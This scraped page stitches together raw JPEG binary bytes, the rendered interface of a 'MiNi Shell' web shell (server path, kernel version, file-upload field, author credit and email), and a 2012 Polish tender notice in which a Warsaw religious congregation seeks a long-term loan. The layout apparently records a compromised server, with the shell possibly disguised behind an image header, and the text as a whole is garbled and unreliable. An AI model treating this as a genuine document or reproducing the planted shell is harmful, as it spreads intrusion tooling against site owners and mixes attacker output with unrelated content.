JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120312/57427-N-2012.html

<p class="kh_header"><b>Warszawa: Udzielenie i obsługa długoterminowego kredytu</b><br>
<b>Numer ogłoszenia: 57427 - 2012; data zamieszczenia: 12.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zgromadzenie Sióstr Matki Bożej Loretańskiej , ul. ks. Ig. Kłopotowskiego 18, 03-717 Warszawa, woj. mazowieckie, tel. 022 6191486 (87), faks 022 6189771.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna Kościół Katolicki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa długoterminowego kredytu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest udzielenie i obsługa długoterminowego kredytu w kwocie 726.266,40 zł (słownie: siedemset dwadzieścia sześć tysięcy dwieście sześćdziesiąt sześć złotych czterdzieści groszy)
na realizację zadania inwestycyjnego Zagospodarowanie obszaru przestrzeni publicznej na terenie Sanktuarium Matki Bożej Loretańskiej w Loretto, wieś Świniotop, gmina Wyszków, dofinansowanego ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich na kwotę 382.101,00 zł na podstawie umowy nr 00158-6922-UM0700071/10 RW.II./AR/0219.4-71/10  z dn. 13 stycznia 2012r. w Warszawie
- opisanego kodem wg Wspólnego Słownika Zamówień CPV :
66.11.30.00-5 usługi udzielania kredytu.

Celem kredytu jest pokrycie wkładu własnego na realizację zadania inwestycyjnego oraz prefinansowanie wydatków pokrywanych środkami z dotacji.Opis warunków świadczenia usługi będącej przedmiotem zamówienia:
1)	Okres kredytowania: 08.2012 - 31.10.2017.
2)	Uruchomienie kredytu nastąpi od dnia podpisania umowy do dnia 30.08.2012 r. w jednej transzy, na podstawie dyspozycji uruchomienia środków z kredytu. Wykorzystanie kredytu odbywa się na podstawie przedłożonych przez Zamawiającego w biurze Wykonawcy faktur potwierdzających wykonanie zadań inwestycyjnych.
3)	Okres spłaty kredytu: 30.09.2012 - 31.10.2017.
4)	Spłata kapitału następować będzie w okresach miesięcznych, wg harmonogramu podanego w pkt 12 poniżej. Nie przewiduje się karencji w spłacie kapitału.
5)	Spłata odsetek następować będzie w okresach miesięcznych do ostatniego dnia danego miesiąca.
6)	Zamawiający zastrzega sobie prawo do wykorzystania mniejszej kwoty kredytu niż określona w umowie w sprawie zamówienia publicznego oraz prawo do spłaty wykorzystanego kredytu przed ustalonym terminem bez ponoszenia dodatkowych opłat i prowizji.
7)	Na wniosek Zamawiającego Wykonawca może udzielić prolongaty w spłacie rat kredytu bez ponoszenia przez Zamawiającego dodatkowych opłat i prowizji.
8)	W całym okresie kredytowania marża Wykonawcy pozostaje na niezmienionym poziomie.
9)	Przy naliczaniu odsetek za okres kredytowania należy stosować stawkę WIBOR 1M.
10)	Odsetki będą naliczane miesięcznie za rzeczywistą liczbę dni wykorzystania kredytu i w odniesieniu do rzeczywistej kwoty wykorzystania kredytu na podstawie stosownych dokumentów obciążeniowych, przy założeniu, że rok liczy 365 dni.
11)	Kwota wykorzystanego kredytu podlega oprocentowaniu w stosunku rocznym wg zmiennej stopy procentowej oprocentowania środków w oparciu o stawkę WIBOR 1M plus marża Wykonawcy (do dwóch miejsc po przecinku).
12)	Wykonawcy do celów porównawczych w swoich harmonogramach proszeni są o przyjęcie założeń dotyczących wypłat transz kredytu oraz spłat kapitału kredytu w następujących kwotach i terminach:
a)	Wypłata kredytu w dn. 15.08.2012 r. w wysokości 726.266,40 zl.
b)	Spłaty poszczególnych rat kapitału wg harmonogramu przedstawionego w tabeli:

Data spłaty	kwota
2012-09-30	70 000,00
2012-10-31	382 101,00
2012-11-30	4 569,42
2012-12-31	4 569,42
2013-01-31	4 569,42
2013-02-28	4 569,42
2013-03-31	4 569,42
2013-04-30	4 569,42
2013-05-31	4 569,42
2013-06-30	4 569,42
2013-07-31	4 569,42
2013-08-31	4 569,42
2013-09-30	4 569,42
2013-10-31	4 569,42
2013-11-30	4 569,42
2013-12-31	4 569,42
2014-01-31	4 569,42
2014-02-28	4 569,42
2014-03-31	4 569,42
2014-04-30	4 569,42
2014-05-31	4 569,42
2014-06-30	4 569,42
2014-07-31	4 569,42
2014-08-31	4 569,42
2014-09-30	4 569,42
2014-10-31	4 569,42
2014-11-30	4 569,42
2014-12-31	4 569,42
2015-01-31	4 569,42
2015-02-28	4 569,42
2015-03-31	4 569,42
2015-04-30	4 569,42
2015-05-31	4 569,42
2015-06-30	4 569,42
2015-07-31	4 569,42
2015-08-31	4 569,42
2015-09-30	4 569,42
2015-10-31	4 569,42
2015-11-30	4 569,42
2015-12-31	4 569,42
2016-01-31	4 569,42
2016-02-29	4 569,42
2016-03-31	4 569,42
2016-04-30	4 569,42
2016-05-31	4 569,42
2016-06-30	4 569,42
2016-07-31	4 569,42
2016-08-31	4 569,42
2016-09-30	4 569,42
2016-10-31	4 569,42
2016-11-30	4 569,42
2016-12-31	4 569,42
2017-01-31	4 569,42
2017-02-28	4 569,42
2017-03-31	4 569,42
2017-04-30	4 569,42
2017-05-31	4 569,42
2017-06-30	4 569,42
2017-07-31	4 569,42
2017-08-31	4 569,42
2017-09-30	4 569,42
2017-10-31	4 569,42

13)	Prowizje i opłaty: kredyt nie może być obciążony innymi prowizjami i opłatami, niż oprocentowanie liczone wg stawki WIBOR 1M powiększonej o marżę Wykonawcy.
14)	Spłata części lub całości kredytu może ulec skróceniu, przy czym wówczas nie jest wymagana zgoda Wykonawcy, nie ma konieczności sporządzania aneksu do zawartej umowy, odsetki naliczone zostaną do momentu spłaty kredytu, nie będzie to miało wpływu na zmianę warunków umowy, jak również Wykonawca z tego powodu nie będzie pobierał żadnych opłat i/lub prowizji.

OPIS SPOSOBU OBLICZENIA CENY
1.	Ceną oferty jest kwota wymieniona w Formularzu Oferty, którą należy podać w PLN. Cena musi uwzględniać wszystkie wymagania niniejszej SIWZ oraz obejmować wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej realizacji przedmiotu zamówienia. Kredyt nie może być obciążony innymi kosztami (opłatami, prowizjami) niż odsetki od kredytu.
2.	Dla celów wyliczenia całkowitego kosztu kredytu należy przyjąć następujące założenia:
1)	Zamawiający zaciągnie i spłaci kredyt zgodnie z następującym harmonogramem, który służy wyłącznie zapewnieniu porównywalności ofert (kwoty i terminy transz oraz spłaty kredytu nie są dla Zamawiającego wiążące):
	Data	Kwota
Zaciągnięcie kredytu	2012-08-15	726 266,40
Spłaty rat kredytu	2012-09-30	70 000,00
	2012-10-31	382 101,00
	2012-11-30	4 569,42
	2012-12-31	4 569,42
	2013-01-31	4 569,42
	2013-02-28	4 569,42
	2013-03-31	4 569,42
	2013-04-30	4 569,42
	2013-05-31	4 569,42
	2013-06-30	4 569,42
	2013-07-31	4 569,42
	2013-08-31	4 569,42
	2013-09-30	4 569,42
	2013-10-31	4 569,42
	2013-11-30	4 569,42
	2013-12-31	4 569,42
	2014-01-31	4 569,42
	2014-02-28	4 569,42
	2014-03-31	4 569,42
	2014-04-30	4 569,42
	2014-05-31	4 569,42
	2014-06-30	4 569,42
	2014-07-31	4 569,42
	2014-08-31	4 569,42
	2014-09-30	4 569,42
	2014-10-31	4 569,42
	2014-11-30	4 569,42
	2014-12-31	4 569,42
	2015-01-31	4 569,42
	2015-02-28	4 569,42
	2015-03-31	4 569,42
	2015-04-30	4 569,42
	2015-05-31	4 569,42
	2015-06-30	4 569,42
	2015-07-31	4 569,42
	2015-08-31	4 569,42
	2015-09-30	4 569,42
	2015-10-31	4 569,42
	2015-11-30	4 569,42
	2015-12-31	4 569,42
	2016-01-31	4 569,42
	2016-02-29	4 569,42
	2016-03-31	4 569,42
	2016-04-30	4 569,42
	2016-05-31	4 569,42
	2016-06-30	4 569,42
	2016-07-31	4 569,42
	2016-08-31	4 569,42
	2016-09-30	4 569,42
	2016-10-31	4 569,42
	2016-11-30	4 569,42
	2016-12-31	4 569,42
	2017-01-31	4 569,42
	2017-02-28	4 569,42
	2017-03-31	4 569,42
	2017-04-30	4 569,42
	2017-05-31	4 569,42
	2017-06-30	4 569,42
	2017-07-31	4 569,42
	2017-08-31	4 569,42
	2017-09-30	4 569,42
	2017-10-31	4 569,42
Razem		726 266,40

2)	Sumę odsetek za okres kredytowania należy obliczyć w oparciu o stopę oprocentowania kredytu rozumianą jako sumę dwóch składników: stopy bazowej oraz marży.
a)	należy przyjąć stopę bazową - WIBOR 1M z dnia 09.03.2012 r. wynoszącą 4,72%. Stawka WIBOR 1M w tej wysokości służy wyłącznie zapewnieniu porównywalności ofert,
b)	należy podać marżę tj. oznaczyć ilość punktów procentowych (wartość dodatnia lub ujemna), o które zostanie powiększona lub pomniejszona stawka bazowa. Marża będzie stała przez cały okres kredytowania (podana z dwoma miejscami po przecinku).
3)	Rata odsetkowa będzie każdorazowo płatna ostatniego dnia miesiąca, przy czym przyjmuje się, że jeżeli termin ten przypada na sobotę lub dzień ustawowo wolny od pracy za ostatni dzień uważa się pierwszy dzień roboczy następujący po tym terminie, miesiąc liczy rzeczywistą ilość dni, zaś rok odsetkowy ma ich 365.
4)	Całkowity koszt kredytu stanowiący sumę odsetek należy podać kwotowo. Obliczona w ten sposób cena oferty służyć będzie porównaniu cen ofert proponowanych przez Wykonawców i wyborowi najkorzystniejszej oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0, 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2017.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami przeznaczonymi do wykonania zamówienia, posiadającymi wymagalne uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Zabezpieczenie spłaty kredytu (Z) - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.loretanki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zgromadzenie Sióstr Loretanek
ul.ks. Ignacego Kłopotowskiego 18
03-717 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 11:00, miejsce: Zgromadzenie Siostr Loretanek
ul.ks. Ignacego Klopotowskiego 18
03-717 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.04.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem niniejszego zamówienia jest udzielenie i obsługa długoterminowego kredytu w kwocie 726.266,40 zł (słownie: siedemset dwadzieścia sześć tysięcy dwieście sześćdziesiąt sześć złotych czterdzieści groszy)
na realizację zadania inwestycyjnego Zagospodarowanie obszaru przestrzeni publicznej na terenie Sanktuarium Matki Bożej Loretańskiej w Loretto, wieś Świniotop, gmina Wyszków, dofinansowanego ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich na kwotę 382.101,00 zł na podstawie umowy nr 00158-6922-UM0700071/10 RW.II./AR/0219.4-71/10  z dn. 13 stycznia 2012r. w Warszawie
- opisanego kodem wg Wspólnego Słownika Zamówień CPV :
66.11.30.00-5 usługi udzielania kredytu.

Celem kredytu jest pokrycie wkładu własnego na realizację zadania inwestycyjnego oraz prefinansowanie wydatków pokrywanych środkami z dotacji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com